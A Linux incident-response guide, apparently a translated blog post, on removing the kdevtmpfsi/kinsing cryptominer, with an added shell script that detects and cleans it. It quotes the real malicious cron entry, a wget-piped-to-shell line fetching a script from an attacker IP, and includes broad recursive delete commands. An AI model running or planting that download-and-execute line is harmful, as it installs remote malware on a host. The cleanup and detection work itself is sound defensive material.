Virus name: kdevtmpfsi
Symptom: CPU pegged at 100%, taking the online service down.
The screenshot is borrowed from elsewhere, but the process is real.
1、# top
Check CPU usage. The process sitting at the top of the list turns out to be kdevtmpfsi.
2、# netstat -natp
Using that process name, inspect its network connections and look for unusual TCP connections to unfamiliar IPs. Look the foreign IPs up; they are most likely the attacker's host serving the mining backdoor.
In cases like this, the mining script has very probably been planted as a scheduled task in the crontab.
crontab -l shows the abnormal cron entry, a download-and-execute one-liner that runs every minute:
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
Check the running process (3127 is the PID top showed on this box; systemctl status accepts a PID and reports the unit/cgroup it runs under, which tells you what started it):
systemctl status 3127
ps aux | grep kinsing
ps aux | grep kdevtmpfsi
Kill both processes, kinsing first: it is the parent that downloads and relaunches kdevtmpfsi, so killing only the miner just gets it respawned.
kill -9 3127
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing
Remember that the kinsing daemon file must be deleted too. If it is not at that path, locate both files with:
find / -name kdevtmpfsi
find / -name kinsing
Go into /var/spool/cron and check whether any scheduled task there runs the trojan; delete every such entry and restart crond afterwards. Also check /etc/crontab and /etc/cron.d, which crontab -l does not show.
Afterwards, trace it back to the source: find the vulnerability that was exploited, block the attacking IPs and any other IPs that have no legitimate reason to be there, and keep a copy of the downloaded script for analysis.
Use clamav to run a full scan of the whole Linux system, identify the infected files and delete them.
Find the daemon's variant file names and delete them all:
find / -name "kinsing*" -print0 | xargs -0 rm -rf
At this point the cleanup is essentially done. Over the following days, keep watching the server's services and check whether any process looks abnormal.
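The steps above, collected into one helper that can be run from a root shell. This is an added example, not a script from the original post; it assumes a Linux host with /proc, procps (pgrep/pkill), iproute2 (ss), chattr and coreutils, and it uses the process and file names the post reports (kinsing, kdevtmpfsi) and the cron locations named above. The cron check is generalised from the single entry seen with crontab -l to any wget/curl-piped-to-shell line in the system-wide cron files as well.

```shell
#!/bin/sh
# Triage/cleanup helper for the kdevtmpfsi + kinsing infection described above.
# Added example, not a script from the original post. Assumptions: Linux with
# /proc, procps (pgrep/pkill), iproute2 (ss), e2fsprogs (chattr) and coreutils;
# the process/file names are the ones the post reports. Run as root.
#
# Usage:  sh kinsing-triage.sh --triage   (read-only: processes, sockets, cron)
#         sh kinsing-triage.sh --clean    (kill processes, purge cron, delete files)

MINER_PROCS="kinsing kdevtmpfsi"   # parent first: kinsing relaunches kdevtmpfsi

# Where a cron persistence entry can hide: the RHEL/CentOS spool from the post
# plus the system-wide files that 'crontab -l' never shows.
CRON_PATHS="/var/spool/cron /var/spool/cron/crontabs /etc/crontab /etc/cron.d"

# is_dropper_line LINE -> success if LINE fetches a URL with wget/curl and pipes
# it straight into a shell, the shape of the entry found with crontab -l above.
is_dropper_line() {
    printf '%s\n' "$1" |
        grep -qE '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh([^[:alnum:]_]|$)'
}

# scan_cron_files PATH... -> prints FILE:LINENO:LINE for each dropper line in
# the given files or directories; missing paths are skipped silently.
scan_cron_files() {
    for p in "$@"; do
        [ -e "$p" ] || continue
        find "$p" -type f 2>/dev/null | while IFS= read -r f; do
            n=0
            while IFS= read -r line || [ -n "$line" ]; do
                n=$((n + 1))
                if is_dropper_line "$line"; then
                    printf '%s:%s:%s\n' "$f" "$n" "$line"
                fi
            done < "$f"
        done
    done
    return 0
}

# show_miner_procs -> PID, parent and on-disk paths of each miner process, read
# from /proc so a binary deleted after launch still shows as "(deleted)", plus
# its TCP connections (ss tags every socket with the owning pid=N).
show_miner_procs() {
    for name in $MINER_PROCS; do
        for pid in $(pgrep -x "$name" 2>/dev/null); do
            ppid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status" 2>/dev/null)
            printf '%s pid=%s ppid=%s exe=%s cwd=%s\n' "$name" "$pid" "$ppid" \
                "$(readlink "/proc/$pid/exe")" "$(readlink "/proc/$pid/cwd")"
            ss -ntp 2>/dev/null | grep "pid=$pid,"
        done
    done
    return 0
}

# kill_miners -> SIGKILL kinsing before kdevtmpfsi; killing only the worker is
# pointless because the parent starts a fresh one right away.
kill_miners() {
    for name in $MINER_PROCS; do
        pkill -9 -x "$name" 2>/dev/null
    done
    sleep 2
    pgrep -lx kinsing; pgrep -lx kdevtmpfsi   # should print nothing now
    return 0
}

# purge_user_crontab [USER] -> reinstall USER's crontab without dropper lines.
purge_user_crontab() {
    u=${1:-root}
    crontab -u "$u" -l 2>/dev/null | while IFS= read -r line; do
        is_dropper_line "$line" || printf '%s\n' "$line"
    done | crontab -u "$u" -
}

# remove_miner_files -> clear the immutable attribute first (some miners set it
# so a plain rm fails), then delete every kinsing*/kdevtmpfsi* file on disk,
# skipping /proc and /sys.
remove_miner_files() {
    find / \( -path /proc -o -path /sys \) -prune -o \
        \( -name 'kinsing*' -o -name 'kdevtmpfsi*' \) -type f \
        -exec sh -c 'chattr -i "$1" 2>/dev/null; rm -f "$1" && echo "removed $1"' _ {} \; \
        2>/dev/null
}

case "${1:-}" in
    --triage) show_miner_procs; scan_cron_files $CRON_PATHS ;;
    --clean)  kill_miners; purge_user_crontab root; remove_miner_files
              scan_cron_files $CRON_PATHS   # anything still listed is in a system file: edit it by hand
              systemctl restart crond 2>/dev/null || systemctl restart cron ;;
esac
```

Run it with --triage first and keep that output (PIDs, parent, exe path, remote IPs, cron lines) as the incident record before anything is killed; --clean only rewrites the root user's crontab, so a dropper line reported from /etc/cron.d or /etc/crontab still has to be removed by hand before cron is restarted.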